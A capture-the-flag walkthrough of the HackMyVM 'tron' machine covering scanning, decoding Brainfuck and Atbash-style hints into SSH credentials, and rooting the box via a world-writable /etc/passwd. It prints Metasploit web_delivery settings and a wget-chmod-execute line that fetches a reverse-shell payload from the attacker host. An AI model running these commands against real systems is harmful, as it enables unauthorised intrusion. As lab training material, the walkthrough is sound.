HackMyVM target series (7) - tron
2022-07-06 13:57:00 【The moon should know my meaning】
1. Information gathering
As shown in the figure, the usual method: start with a scan of the network segment to detect live hosts.
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Then use nmap to scan the ports and enumerate the open services. The target host has the ssh and http services open.
nmap -sC -sV -p- 192.168.200.168
Accessing the target's http service shows the result below.
Right-click to view the page source, where the following string is found. It looks like an account and password.
Trying to log in to the target host with this password fails.
kzhh:SbWP9q94ZtE9qD
Next, run a directory scan and see whether anything new turns up.
gobuster dir -u http://192.168.200.168/ -w /tools/dict/directory-list-2.3-medium.txt -x php,html,txt,zip,7z,gz,bak -t 30
There are quite a lot of files and directories. Visit them one by one.
After going through them, valid information is found only in the /MCP directory.
As shown in the figure, there is a tron.txt file.
Open this file.
The file contains a dialogue, with a long string at the bottom.
Translate the dialogue.
The string at the bottom looks like base64. Decoding it gives the following result, which also looks like some kind of encoding, but one I have never seen before.
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.----.-----------.++++++++++++++++++++++++.--------------------.+++++++++++++.
A quick Baidu search shows that this is Brainfuck code.
Brainfuck Interpreter
Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]
The decoded result is player. Combined with the dialogue above, this is probably a user name.
Continuing to visit the files in the /MCP/ directory, I found a file with the following contents.
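Rather than paste the string into an online decoder, the program can be run offline. The following Python interpreter is an added example and not part of the original write-up; it executes the Brainfuck program recovered from tron.txt and returns the decoded text. Because the program came from the target host, it runs with a bounded tape and a step limit so a malformed or looping program cannot hang the analyst's machine.

```python
"""Minimal Brainfuck interpreter used to decode the hint found in /MCP/tron.txt.

Added example (not the original post's code). Cells are 8-bit and wrap, as in
the classic implementation; the tape and step count are bounded so that an
untrusted program cannot run forever or walk off the tape.
"""

# Program as recovered from the target (after base64 decoding).
BF_PROGRAM = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.----."
    "-----------.++++++++++++++++++++++++.--------------------.+++++++++++++."
)


def build_jump_table(code):
    """Pre-compute matching bracket positions so loop jumps are O(1)."""
    stack, jumps = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError("unmatched ']' at offset %d" % pos)
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError("unmatched '[' at offset %d" % stack[-1])
    return jumps


def run_brainfuck(code, stdin=b"", tape_size=30000, max_steps=1000000):
    """Execute a Brainfuck program and return everything it printed as a str."""
    # Anything that is not one of the eight commands is a comment in Brainfuck.
    code = "".join(ch for ch in code if ch in "+-<>.,[]")
    jumps = build_jump_table(code)
    tape = bytearray(tape_size)
    ptr = pc = steps = 0
    pending_input = list(stdin)
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program may not terminate")
        ch = code[pc]
        if ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            # EOF is modelled as 0, a common convention.
            tape[ptr] = pending_input.pop(0) if pending_input else 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]          # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]          # jump back to the matching '['
        pc += 1
    return out.decode("latin-1")


def decode_tron_hint():
    """Decode the program from tron.txt; the write-up reports 'player'."""
    return run_brainfuck(BF_PROGRAM)


if __name__ == "__main__":
    print(decode_tron_hint())
```

The loop in the program fills four cells with 10, 30, 70 and 100 and then adjusts the last cell up and down around 100 to print each letter, which is why the output is the six-character user name.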
plaintext --- Plaintext
ciphertext--- Ciphertext
My guess is that the password here has been encrypted with a substitution cipher, and the encrypted password is probably the comment seen earlier in the page source.
kzhh:SbWP9q94ZtE9qD
2. Exploitation
As shown in the figure, decrypt the ciphertext.
This gives the password:
pass:SyWP9j94ZgE9jD
The script is as follows (the substitution maps each lowercase letter to its mirror in the alphabet, a to z, b to y, and so on; digits, punctuation and uppercase letters are left unchanged):
    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    # Plain alphabet and its reverse: the cipher replaces each letter
    # with the letter at the same position in the reversed alphabet.
    str1 = "abcdefghijklmnopqrstuvwxyz"
    str2 = "zyxwvutsrqponmlkjihgfedcba"
    ciphertext = "kzhh:SbWP9q94ZtE9qD"
    plaintext = ""
    for i, c in enumerate(ciphertext):
        if c in str2:
            # Lowercase letter: look it up in the reversed alphabet
            # and take the letter at the same index in the plain one.
            index = str2.find(c)
            plaintext += str1[index]
        else:
            # Anything else (uppercase, digits, ':') is copied as-is.
            plaintext += c
    print(plaintext)
Log in to the target host with the user name and password obtained.
ssh player@192.168.200.168
This gives the first flag.
3. Privilege escalation
Enter the following command:
sudo -l
Since sudo is not available, try SUID and SGID binaries for privilege escalation.
Enter the following commands:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
The result is shown in the figure: there is no file that can be used for privilege escalation.
Since none of this works, upload a script to collect more detailed information.
Here we could use nc, curl or wget together with an http service to download files directly onto the target machine, but I recently came across this msf module, which is very interesting: a single command brings the target online in msf. So I am going to use msf.
use exploit/multi/script/web_delivery # This module launches msf by directly executing a command
show target # List the available targets
set target 7
set payload payload/linux/x86/meterpreter/reverse_tcp # Set up payload
set srvport 6666
set lhost 192.168.200.218
run
Running the module produces the following command:
wget -qO 3gsWPNx9 --no-check-certificate http://192.168.200.218:6666/3vM41a0iXQ; chmod +x 3gsWPNx9; ./3gsWPNx9& disown
Execute the command on the target host.
As shown in the figure, the MSF session is established.
Upload the information-gathering script to the target machine:
upload /home/kali/LinEnum.sh
The script collects a lot of information; I will not screenshot it all.
As shown in the figure, /etc/passwd is found to be readable and writable by any user.
So can we modify /etc/passwd to escalate privileges?
Linux has two files related to passwords: /etc/passwd and /etc/shadow.
The former stores user information, the latter the encrypted passwords. But there is a peculiarity: if a password hash is stored in the password field of /etc/passwd, it takes precedence, even when it differs from the one in /etc/shadow.
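The two conditions this escalation relies on, a world-writable /etc/passwd and a hash sitting in the passwd entry instead of the shadow file, are exactly what a defender should check for. The following Python audit is an added example, not part of the original post; the sample entries are constructed, and the hash in the tampered root line is a labelled placeholder rather than a real crypt value.

```python
"""Audit /etc/passwd for the weaknesses used in this write-up.

Added example, not the original post's code. Flags: a world-writable file,
entries whose password field holds a hash (honoured ahead of /etc/shadow),
empty password fields, and extra UID 0 accounts.
"""
import os
import stat

# Constructed sample: ordinary entries plus a tampered root line whose second
# field carries a placeholder crypt-style hash instead of the 'x' shadow marker,
# and a second UID 0 account.
SAMPLE_PASSWD = """\
root:$1$PLACEHOLDER$notarealhashXXXXXXXXXXXX:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
player:x:1000:1000:player:/home/player:/bin/bash
backdoor:x:0:0::/root:/bin/bash
"""

# Values that mean "the real hash lives in /etc/shadow" or "account locked".
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def audit_passwd_lines(text):
    """Return (line_no, user, finding) tuples for every suspicious entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, line, "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((n, user, "empty password field (passwordless login)"))
        elif pw not in SHADOW_MARKERS:
            findings.append((n, user, "password hash stored in /etc/passwd, overrides /etc/shadow"))
        if uid == "0" and user != "root":
            findings.append((n, user, "non-root account with UID 0"))
    return findings


def is_world_writable(mode):
    """True if the st_mode bits grant write permission to 'other'."""
    return bool(mode & stat.S_IWOTH)


def audit_passwd_file(path="/etc/passwd"):
    """Combine the permission check and the content check on a real file."""
    problems = []
    mode = os.stat(path).st_mode
    if is_world_writable(mode):
        problems.append((0, path, "file is world-writable (mode %o)" % stat.S_IMODE(mode)))
    with open(path, encoding="utf-8", errors="replace") as fh:
        problems.extend(audit_passwd_lines(fh.read()))
    return problems


if __name__ == "__main__":
    for item in audit_passwd_lines(SAMPLE_PASSWD):
        print("line %d %s: %s" % item)
```

On the sample input the audit reports the root line (hash present in the passwd entry) and the backdoor line (UID 0). Running audit_passwd_file() on a live host adds the mode check, which is the condition that made this box exploitable in the first place.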
As shown in the figure, enter the following command to generate the encrypted password:
openssl passwd
Use msf to edit the /etc/passwd file and change root's password as follows:
edit /etc/passwd
Remote login for root is not enabled here, so connecting directly from kali fails.
Instead, switch to the root user locally.
As shown in the figure, privileges are successfully escalated to root and the second flag is obtained.